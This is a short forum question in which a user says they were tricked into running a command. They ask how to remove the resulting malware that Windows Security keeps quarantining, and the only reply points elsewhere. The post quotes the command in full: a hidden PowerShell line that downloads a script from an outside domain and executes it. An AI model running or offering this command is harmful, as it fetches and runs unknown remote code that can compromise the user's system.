How do I turn off/get rid of a malicious software that keeps getting blocked by Microsoft Security?
I was tricked into running this code in my command line. Thankfully my antivirus is on so I was able to limit the damage, but it keeps popping up frequently and I keep getting alerts from Windows Security that the threat has been quarantined. Where can I find the source file and how do I get rid of it:
"powershell.exe -W Hidden -command  $uR='https://draffeler.com/cf/afs.txt'; $reS=Invoke-WebRequest -Uri $uR -UseBasicParsing; $t=$reS.Content; iex $t"

I suggest asking on [SU].
